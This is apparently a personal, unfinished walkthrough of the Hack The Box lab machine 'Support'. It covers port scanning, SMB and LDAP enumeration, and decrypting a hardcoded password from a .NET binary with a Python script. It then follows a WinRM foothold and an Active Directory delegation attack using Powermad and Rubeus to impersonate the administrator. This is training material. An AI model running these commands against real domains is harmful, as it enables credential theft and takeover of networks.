Support

Easy - Windows

Recon

$ sudo nmap -T4 -sC -sV -O 10.10.11.174 -oN nmap.txt -Pn -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-06 16:37 CST
Nmap scan report for 10.10.11.174
Host is up (0.21s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-12-07 01:25:54Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49679/tcp open  msrpc         Microsoft Windows RPC
49705/tcp open  msrpc         Microsoft Windows RPC
60575/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1s
| smb2-time: 
|   date: 2022-12-07T01:26:56
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1105.50 seconds

Enumeration - DNS

Obviously there's a lot going on in the port list, I'll start at the top and see if I can extract anything from the DNS server.

$ dig version.bind CHAOS TXT @10.10.11.174

Using dig to grab a BIND DNS banner didn't give me any answers. How about ANY records?

$ dig any support.htb @10.10.11.174

; <<>> DiG 9.16.33-Debian <<>> any support.htb @10.10.11.174
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59774
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;support.htb.                   IN      ANY

;; ANSWER SECTION:
support.htb.            600     IN      A       10.10.11.174
support.htb.            3600    IN      NS      dc.support.htb.
support.htb.            3600    IN      SOA     dc.support.htb. hostmaster.support.htb. 104 900 600 86400 3600

;; ADDITIONAL SECTION:
dc.support.htb.         1200    IN      A       10.10.11.174

;; Query time: 1590 msec
;; SERVER: 10.10.11.174#53(10.10.11.174)
;; WHEN: Tue Dec 06 16:51:06 CST 2022
;; MSG SIZE  rcvd: 136

I get a couple subdomains from this. I'll save these for later as I'm not quite sure yet. I'll assume dc is domain controller, although my Windows knowledge is still very fresh. In the meantime, I start a a gobuster DNS brute force to see if there are any other undisclosed subdomains. Time to move on to SMB for a bit.

Enumeration - SMB

$ smbmap -H 10.10.11.174 -u anonymous
[+] Guest session       IP: 10.10.11.174:445    Name: dc.support.htbn                                   
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        support-tools                                           READ ONLY       support staff tools
        SYSVOL                                                  NO ACCESS       Logon server share

Interesting. A read-only share support-tools, what sort of data can we find in there.

$ smbclient \\\\10.10.11.174\\support-tools
Enter WORKGROUP\ventus's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jul 20 12:01:06 2022
  ..                                  D        0  Sat May 28 06:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 06:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 06:19:55 2022
  putty.exe                           A  1273576  Sat May 28 06:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 06:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 12:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 06:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 06:19:43 2022

                4026367 blocks of size 4096. 969076 blocks available
smb: \>

Reverse Engineering

UserInfo.exe.zip eh? Unzipped: (oh and by the way, that gobuster DNS brute didn't give anything more)

$ ls
.rw-rw-rw-  99k ventus  1 Mar 12:18 CommandLineParser.dll
.rw-rw-rw-  22k ventus 22 Oct  2021 Microsoft.Bcl.AsyncInterfaces.dll
.rw-rw-rw-  47k ventus 22 Oct  2021 Microsoft.Extensions.DependencyInjection.Abstractions.dll
.rw-rw-rw-  84k ventus 22 Oct  2021 Microsoft.Extensions.DependencyInjection.dll
.rw-rw-rw-  64k ventus 22 Oct  2021 Microsoft.Extensions.Logging.Abstractions.dll
.rw-rw-rw-  20k ventus 19 Feb  2020 System.Buffers.dll
.rw-rw-rw- 141k ventus 19 Feb  2020 System.Memory.dll
.rw-rw-rw- 115k ventus 15 May  2018 System.Numerics.Vectors.dll
.rw-rw-rw-  18k ventus 22 Oct  2021 System.Runtime.CompilerServices.Unsafe.dll
.rw-rw-rw-  25k ventus 19 Feb  2020 System.Threading.Tasks.Extensions.dll
.rwxrwxrwx  12k ventus 27 May 12:51 UserInfo.exe
.rw-rw-rw-  563 ventus 27 May 11:59 UserInfo.exe.config

I originally dragged UserInfo.exe into Ghidra to decompile it, although that didn't do too well so I tried out DNSpy and that did a great job at decompiling this .NET binary.

Moving along, I looked through the PE's objects to get a grasp on what this binary does. In the UserInfo.Services namespace, I find the LdapQuery class. Its methods include query() and printUser(). On class initialization, there is a call to Protected.getPassword() which I can assume it may be the LDAP password. That password is then used to login to the support.htb LDAP server through the System.DirectoryServices library. Sounds like a way in, time to check out the getPassword method.

Protected()

public static string getPassword()
{
	byte[] array = Convert.FromBase64String(Protected.enc_password);
	byte[] array2 = array;
	for (int i = 0; i < array.Length; i++)
	{
		array2[i] = array[i] ^ Protected.key[i % Protected.key.Length] ^ 223;
	}
	return Encoding.Default.GetString(array2);
}

...

private static string enc_password = "0...E";

Let's step through the method. First off, it's decoding Protected.enc_password in Base64 format. After that, it copies the character array of the Base64 decoded string, goes into a for loop based on the original array length, and does some XOR and moduli with the key's character index to decrypt it. Sorry to say that security by obscurity doesn't quite work that well.

Protected.getPassword()

	for (int i = 0; i < array.Length; i++)
	{
		array2[i] = array[i] ^ Protected.key[i % Protected.key.Length] ^ 223;
	}

Protected()

private static byte[] key = Encoding.ASCII.GetBytes("a...o");

I'll copy this over in Python to see if I can decrypt it there.

decrypt_password.py

import base64

key = "a...o".encode("utf-8")
enc = base64.b64decode("O...E")

print("".join([chr(enc[i] ^ key[i % len(key)] ^ 223) for i in range(len(enc))]))

$ python decrypt_password.py
n...z

Exploiting LDAP

Alright let's try it. Using the username from LdapQuery initializer and the password we decoded, I tried to do an ldapdomaindump and...

$ ldapdomaindump 10.10.11.174 -u 'support\\ldap' -p 'n...z' -at SIMPLE
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '80090308: LdapErr: DSID-0C090436, comment: AcceptSecurityContext error, data 52e, v4f7c\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}

Possibly not using this correctly. I need to read up on LDAP. Good ol' HackTricks GitBook helped me through a lot of service exploitation, here's a section on LDAP. Let's use ldapsearch and filter for sAMAccountName as stated in the LdapQuery query method.

$  ldapsearch -x -H ldap://10.10.11.174 -D 'support\ldap' -w 'n...z' -b "DC=support,DC=htb" "sAMAccountName" | grep sAMAccountName
...
sAMAccountName: ldap
sAMAccountName: support
sAMAccountName: smith.rosario
sAMAccountName: hernandez.stanley
...

If there's one thing I learned about LDAP, it's that it gives you so many lines of info. Anyways. Lots of stuff, but I see a user named support here. Let's dig into that.

$ ldapsearch -x -H ldap://10.10.11.174 -D 'support\ldap' -w 'n...z' -b "CN=support,CN=Users,DC=support,DC=htb"
# extended LDIF
#
# LDAPv3
# base <CN=support,CN=Users,DC=support,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
...
info: Iron...l

This info field had a string that looked very much like a passphrase. Time to save that.

Getting access

I was stuck for a while, I wasn't sure what to do next even though I had creds to test. I looked back at the nmap scan results again and researched more about Windows administration services. After more consulting with the wonderful HackTricks GitBook, I found WinRM which might allow me to get command line access to the server. I picked up evil-winrm to try and authenticate with the server from my Linux box.

$ evil-winrm -u support -p 'Iron...l'  -i 10.10.11.174

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\support\Documents>

After some with evil-winrm's command arguments (I was stuck on having the wrong domain in the -i flag, but apparently it's not needed), finally I have acquired PowerShell access on the server. Now it's time for looting.

Privilege Escalation

Alright, heading to Desktop, I get the user flag and now it's time for privilege escalation. This part was going way over my head. I took a look at the Windows Local Privilege Escalation section from HackTricks, but nothing seemed too viable. It seemed the support user had limited privileges and was denied access to many system tasks, even stuff as basic as systeminfo. mimikatz it is. Worth a shot.

...
mimikatz #
mimikatz #
mimikatz #
mimikatz #
mimikatz #
mimikatz #
mimikatz #
mimikatz #
mimikatz #
mimikatz #
mimikatz #
mimikatz #
mimikatz #
mimikatz #
mimikatz #
mimikatz #
mimikatz #
mimikatz #
mimikatz #
mimikatz #
^C^C

Warning: Press "y" to exit, press any other key to continue

^C

Alright then, nevermind. WinRM says no. Guess it's back to the drawing board.

Active Directory & Kerberos Abuse

After about half an hour of research, I crawled upon AD/Kerberos abuse which seemed to be my only hope at the moment. Firstly, I wanted to get some PowerShell post-exploitation modules going. With evil-winrm, I uploaded PowerView.ps1 which is a pretty large module, but it would make life easier. Since we didn't seem to have any users with SPN enabled, I think this process from Red Team Notes is what I'm gonna go with first.

First off, I need to verify we can create new Computer objects to the domain. Looks like we can.

*Evil-WinRM* PS C:\Users\support\Desktop> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainObject -Identity "dc=support,dc=htb" -Domain support.htb
...
ms-ds-machineaccountquota                   : 10

Get-DomainController tells us that we're using Windows Server 2022 Standard. Next I need to find a Computer object which does not have a specific flag set. Viewing all AD computers, I find the DCcomputer does not have this flag set.

*Evil-WinRM* PS C:\Users\support\Desktop> Get-NetComputer DC | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity*

name       msds-allowedtoactonbehalfofotheridentity*
----       -----------------------------------------
DC

Now let's load PowerMad and create a Computer object.

*Evil-WinRM* PS C:\Users\support\Desktop> import-module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\support\Desktop> New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Verbose: [+] Domain Controller = dc.support.htb
Verbose: [+] Domain = support.htb
Verbose: [+] SAMAccountName = FAKE01$
Verbose: [+] Distinguished Name = CN=FAKE01,CN=Computers,DC=support,DC=htb
[+] Machine account FAKE01 added

Next off, I create a new RawSecurityDescriptor to apply to the DC computer. Now to verify:

*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity'

msds-allowedtoactonbehalfofotheridentity
----------------------------------------
{1, 0, 4, 128...}

Nice, things are lining up. Now, Red Team Notes wants to use Rubeus to allow raw interactions with Kerberos abuses. I didn't want to compile it on my machine, but I did find a compiled binary here. I uploaded it through WinRM and continued with the process.

*Evil-WinRM* PS C:\Users\support\Desktop> .\Rubeus.exe hash /password:123456 /user:fake01 /domain:support.htb

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0


[*] Action: Calculate Password Hash(es)

[*] Input password             : 123456
[*] Input username             : fake01
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTBfake01
[*]       rc4_hmac             : 3...4
[*]       aes128_cts_hmac_sha1 : 3...3
[*]       aes256_cts_hmac_sha1 : 3...4
[*]       des_cbc_md5          : E...B

I have the RC4 HMAC, now it's time to impersonate.

.\Rubeus.exe s4u /user:fake01$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:administrator /msdsspn:cifs/dc /ptt            

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: S4U

[*] Using rc4_hmac hash: 32ED87BDB5FDC5E9CBA88547376818D4
[*] Building AS-REQ (w/ preauth) for: 'support.htb\fake01$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      ...

[*] Action: S4U

[*] Building S4U2self request for: 'fake01$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'fake01$@SUPPORT.HTB'
[*] base64(ticket.kirbi):

      ...

[*] Impersonating user 'administrator' to target SPN 'cifs/dc'
[*] Building S4U2proxy request for service: 'cifs/dc'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc':

      ...

[+] Ticket successfully imported!

*Evil-WinRM* PS C:\Users\support\Desktop> dir \\dc.support.htb\c$
Access is denied
At line:1 char:1
+ dir \\dc.support.htb\c$
+ ~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (\\dc.support.htb\c$:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
Cannot find path '\\dc.support.htb\c$' because it does not exist.
At line:1 char:1
+ dir \\dc.support.htb\c$
+ ~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (\\dc.support.htb\c$:String) [Get-ChildItem], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users\support\Desktop>

Permission denied. Ugh. I attempted this command different times as the writeup on this abuse had some trouble as well.

For now, I need a break as I've been at it for hours. Next time!